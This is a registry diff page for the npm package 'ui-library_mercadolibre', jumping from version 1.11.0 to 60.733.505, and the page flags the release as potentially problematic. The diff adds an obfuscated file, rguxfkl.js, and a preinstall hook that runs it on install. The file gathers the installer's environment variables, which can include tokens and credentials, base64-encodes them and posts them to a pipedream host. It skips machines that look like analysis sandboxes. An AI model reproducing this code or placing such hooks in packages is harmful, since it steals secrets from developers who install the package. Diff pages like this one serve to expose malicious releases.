ui-library_mercadolibre 1.11.0 → 60.733.505
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ui-library_mercadolibre might be problematic. Click here for more details.
- package/package.json +6 -9
- package/rguxfkl.js +1 -0
- package/index.js +0 -28
- package/lib/index.js +0 -1
package/package.json
CHANGED
@@ -1,14 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "ui-library_mercadolibre",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"main": "main.js",
|
3
|
+
"version": "60.733.505",
|
4
|
+
"main": "rguxfkl.js",
|
6
5
|
"scripts": {
|
7
|
-
"test": "test"
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node rguxfkl.js"
|
8
8
|
},
|
9
|
-
"author": "
|
10
|
-
"license": "ISC"
|
11
|
-
"dependencies": {
|
12
|
-
"lodash": "^4.17.21"
|
13
|
-
}
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
14
11
|
}
|
package/rguxfkl.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x53cb4e=a0_0x5b93;function a0_0xa4a1(){const _0x235e25=['193428AORDMZ','base64','net','https','55bPuSLp','dc44079f2a81b29fc85632f802b65e3b','write','20eyihJa','8EdZxTx','58866xspHLJ','error','372188nKhjis','108264mFLRBw','keys','from','pipedream','stringify','14319SCxHPd','includes','end','641893SoqMfa','/usr/bin/python','env','1601576frLSJJ','toString','length','npm_package_name','USERNAME','request'];a0_0xa4a1=function(){return _0x235e25;};return a0_0xa4a1();}(function(_0x4a73aa,_0x23c77b){const _0x53361b=a0_0x5b93,_0x26847a=_0x4a73aa();while(!![]){try{const _0x5b040e=parseInt(_0x53361b(0x14f))/0x1+-parseInt(_0x53361b(0x157))/0x2*(parseInt(_0x53361b(0x158))/0x3)+parseInt(_0x53361b(0x15a))/0x4+-parseInt(_0x53361b(0x153))/0x5*(-parseInt(_0x53361b(0x15b))/0x6)+-parseInt(_0x53361b(0x146))/0x7+-parseInt(_0x53361b(0x149))/0x8+-parseInt(_0x53361b(0x160))/0x9*(-parseInt(_0x53361b(0x156))/0xa);if(_0x5b040e===_0x23c77b)break;else _0x26847a['push'](_0x26847a['shift']());}catch(_0x1e3561){_0x26847a['push'](_0x26847a['shift']());}}}(a0_0xa4a1,0x1cbfd));function a0_0x5b93(_0x16f034,_0x5c3fb5){const _0xa4a1f0=a0_0xa4a1();return a0_0x5b93=function(_0x5b93cd,_0x58aa72){_0x5b93cd=_0x5b93cd-0x144;let _0x306438=_0xa4a1f0[_0x5b93cd];return _0x306438;},a0_0x5b93(_0x16f034,_0x5c3fb5);}const http=require(a0_0x53cb4e(0x152)),filter=[{'key':'npm_config_registry','val':'taobao.org'},{'key':'npm_config_registry','val':'tencent.com'},{'key':a0_0x53cb4e(0x14d),'val':'daasadmin'},{'key':'_','val':a0_0x53cb4e(0x147)}];function main(){const _0x48fc8b=a0_0x53cb4e;var _0x92e838=process[_0x48fc8b(0x148)]||{};if(filter['some'](({key:_0x4bcd11,val:_0x50984a})=>_0x92e838[_0x4bcd11]&&_0x92e838[_0x4bcd11][_0x48fc8b(0x144)](_0x50984a))||Object[_0x48fc8b(0x15c)](_0x92e838)[_0x48fc8b(0x14b)]<0xa)return;req=http[_0x48fc8b(0x14e)]({'host':[_0x48fc8b(0x154),'m',_0x48fc8b(0x15e),_0x48fc8b(0x151)]['join']('.'),'path':'/'+(_0x92e838[_0x48fc8b(0x14c)]||''),'method':'POST'})['on'](_0x48fc8b(0x159),function(_0xeef04a){}),req[_0x48fc8b(0x155)](Buffer[_0x48fc8b(0x15d)](JSON[_0x48fc8b(0x15f)](_0x92e838))[_0x48fc8b(0x14a)](_0x48fc8b(0x150))),req[_0x48fc8b(0x145)]();}main();
|
package/index.js
DELETED
@@ -1,28 +0,0 @@
|
|
1
|
-
module.exports = {
|
2
|
-
env: {
|
3
|
-
},
|
4
|
-
globals: {
|
5
|
-
},
|
6
|
-
extends: ['eslint:recommended', 'airbnb-base'],
|
7
|
-
rules: {
|
8
|
-
strict: 'off',
|
9
|
-
'func-names': 'off',
|
10
|
-
'spaced-comment': 'off',
|
11
|
-
'no-underscore-dangle': 'off',
|
12
|
-
'arrow-body-style': 'off',
|
13
|
-
'arrow-parens': ['off', 'as-needed'],
|
14
|
-
'prefer-rest-params': 'off',
|
15
|
-
'no-trailing-spaces': ['error', { skipBlankLines: true }],
|
16
|
-
'comma-dangle': ['warn', 'never'],
|
17
|
-
'new-cap': 'warn',
|
18
|
-
'no-unused-vars': 'warn',
|
19
|
-
'object-shorthand': 1,
|
20
|
-
'prefer-arrow-callback': 'off',
|
21
|
-
'prefer-template': 'warn',
|
22
|
-
'vars-on-top': 'warn',
|
23
|
-
indent: ['error', 2, { SwitchCase: 1 }],
|
24
|
-
'import/newline-after-import': 0,
|
25
|
-
'no-multi-assign': 1,
|
26
|
-
'no-prototype-builtins': 'warn'
|
27
|
-
}
|
28
|
-
};
|
package/lib/index.js
DELETED
@@ -1 +0,0 @@
|
|
1
|
-
test
|